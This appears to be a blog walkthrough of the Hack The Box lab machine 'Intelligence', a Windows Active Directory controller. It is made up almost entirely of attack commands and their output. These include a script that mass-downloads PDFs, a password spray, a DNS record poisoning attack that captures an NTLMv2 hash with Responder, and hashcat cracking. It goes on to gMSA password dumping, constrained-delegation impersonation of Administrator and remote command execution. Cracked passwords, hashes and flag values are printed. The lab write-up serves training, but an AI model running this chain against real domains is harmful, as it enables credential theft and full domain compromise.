Intelligence

Hack The Box Machines Windows No Comments
$ rustscan -a 10.129.137.82
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack
80/tcp    open  http             syn-ack
88/tcp    open  kerberos-sec     syn-ack
135/tcp   open  msrpc            syn-ack
139/tcp   open  netbios-ssn      syn-ack
389/tcp   open  ldap             syn-ack
445/tcp   open  microsoft-ds     syn-ack
464/tcp   open  kpasswd5         syn-ack
593/tcp   open  http-rpc-epmap   syn-ack
636/tcp   open  ldapssl          syn-ack
3268/tcp  open  globalcatLDAP    syn-ack
3269/tcp  open  globalcatLDAPssl syn-ack
5985/tcp  open  wsman            syn-ack
9389/tcp  open  adws             syn-ack
49667/tcp open  unknown          syn-ack
49677/tcp open  unknown          syn-ack
49678/tcp open  unknown          syn-ack
49698/tcp open  unknown          syn-ack
49704/tcp open  unknown          syn-ack
52979/tcp open  unknown          syn-ack
$ sudo nmap -p- -T4 -A 10.129.137.82
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-06 23:30:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
52979/tcp open  msrpc         Microsoft Windows RPC
$ echo 10.129.137.82 intelligence.htb dc.intelligence.htb | sudo tee -a /etc/hosts
$ nikto -h http://intelligence.htb
$ dirb http://intelligence.htb
http://intelligence.htb/documents/2020-01-01-upload.pdf
http://intelligence.htb/documents/2020-12-15-upload.pdf
contact@intelligence.htb
download all pdf files:

import  requests
import wget

def url_ok(url):
    r = requests.head(url)
    return r.status_code

year = 2019
while year < 2022:
    month = 1
    while month < 13:
        day = 1
        while day < 31:
            date = str(year) + "-" + str(month).zfill(2) + "-" + str(day).zfill(2)
            pdf = date + "-upload.pdf" 
            url = "http://intelligence.htb/documents/" + pdf
            url_status = url_ok(url)
            if url_status == 200:
                print(url + "\t" + "Document Exists\n")
                wget.download(url, pdf)
            day += 1
        month += 1
    year += 1

kali@kali:~/0.htb/release_arena/Intelligence/doc$ pdfgrep password *.pdf 
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.

http://intelligence.htb/documents/2020-06-04-upload.pdf
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible

kali@kali:~/0.htb/release_arena/Intelligence/pdf$ exiftool *.pdf | grep Creator | awk '{print $3}' | sort -u > users.txt
kali@kali:~/0.htb/release_arena/Intelligence/pdf$ cat users.txt 
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
$ crackmapexec ldap intelligence.htb -u ./users.txt -p 'NewIntelligenceCorpUser9876' 
LDAP        10.129.137.82   389    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient -L \\\\intelligence.htb\\ -U Tiffany.Molina 
Enter WORKGROUP\Tiffany.Molina's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        IT              Disk      
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available
kali@kali:~/0.htb/release_arena/Intelligence$ 
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina 
Enter WORKGROUP\Tiffany.Molina's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Apr 18 20:50:55 2021
  ..                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

                3770367 blocks of size 4096. 1437988 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (9.7 KiloBytes/sec) (average 9.7 KiloBytes/sec)
smb: \> 


smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 21:20:26 2021
  ..                                 DR        0  Sun Apr 18 21:20:26 2021
  Administrator                       D        0  Sun Apr 18 20:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 03:21:46 2018
  Default                           DHR        0  Sun Apr 18 22:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 03:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:11:27 2018
  Public                             DR        0  Sun Apr 18 20:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 21:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 20:51:46 2021

                3770367 blocks of size 4096. 1438244 blocks available
smb: \> 
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
$ python3 krbrelayx-master/dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 --action add -r web.intelligence.htb -d 10.10.14.34 10.129.137.82
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/kali/0.htb/release_arena/Intelligence/krbrelayx-master/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
kali@kali:~/0.htb/release_arena/Intelligence$ 
$ sudo responder -I tun0 -A
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.34]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-S68NRQA808Z]
    Responder Domain Name      [36ZS.LOCAL]
    Responder DCE-RPC Port     [48746]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.34) is not on the same subnet than the DNS server (192.168.8.2).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.

[+] Listening for events...
[HTTP] NTLMv2 Client   : 10.129.137.82
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:a8c6796a545b97ca:508A3579A7B1715B69176066E5C68141:0101000000000000D5FD7B3F7873D70182DE8300667F48AF0000000002000800330036005A00530001001E00570049004E002D005300360038004E005200510041003800300038005A0004001400330036005A0053002E004C004F00430041004C0003003400570049004E002D005300360038004E005200510041003800300038005A002E00330036005A0053002E004C004F00430041004C0005001400330036005A0053002E004C004F00430041004C000800300030000000000000000000000000200000D38D5EC815CEE064867BD79E03809568C091433B9CBCE194FB1F6C5D959E4E8E0A001000000000000000000000000000000000000900440048005400540050002F0077006500620073006F006D0065007400680069006E0067002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 
[*] Skipping previously captured hash for intelligence\Ted.Graves
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --show
TED.GRAVES::intelligence:a8c6796a545b97ca:508a3579a7b1715b69176066e5c68141:0101000000000000d5fd7b3f7873d70182de8300667f48af0000000002000800330036005a00530001001e00570049004e002d005300360038004e005200510041003800300038005a0004001400330036005a0053002e004c004f00430041004c0003003400570049004e002d005300360038004e005200510041003800300038005a002e00330036005a0053002e004c004f00430041004c0005001400330036005a0053002e004c004f00430041004c000800300030000000000000000000000000200000d38d5ec815cee064867bd79e03809568c091433b9cbce194fb1f6c5d959e4e8e0a001000000000000000000000000000000000000900440048005400540050002f0077006500620073006f006d0065007400680069006e0067002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
kali@kali:~/0.htb/release_arena/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
Cloning into 'gMSADumper'...
remote: Enumerating objects: 8, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 8 (delta 0), reused 8 (delta 0), pack-reused 0
Receiving objects: 100% (8/8), 14.02 KiB | 341.00 KiB/s, done.

kali@kali:~/0.htb/release_arena/Intelligence$ cd gMSADumper/
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ ll
total 36
-rw-r--r-- 1 kali kali  3312 Jul  6 13:50 gMSADumper.py
-rw-r--r-- 1 kali kali     0 Jul  6 13:50 __init__.py
drwxr-xr-x 2 kali kali  4096 Jul  6 13:50 __pycache__
-rw-r--r-- 1 kali kali   491 Jul  6 13:50 README.md
-rw-r--r-- 1 kali kali 22862 Jul  6 13:50 structure.py
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ 

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy  -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ 

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  sudo net time set -S intelligence.htb
[sudo] password for kali: 

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator

2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache


# Export RKB Ticket
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ export KRB5CCNAME=Administrator.ccache

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Tiffany.Molina\Desktop\user.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \tgNjYZHc
[*] Running task \tgNjYZHc
[*] Deleting task \tgNjYZHc
[*] Attempting to read ADMIN$\Temp\tgNjYZHc.tmp
2cca7a12ad640c699d8069c7a2eab160

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \MEbHJZiS
[*] Running task \MEbHJZiS
[*] Deleting task \MEbHJZiS
[*] Attempting to read ADMIN$\Temp\MEbHJZiS.tmp
dd95742569cd89e4eecb082d39c44891

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$

Leave a Reply

Your email address will not be published. Required fields are marked *

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation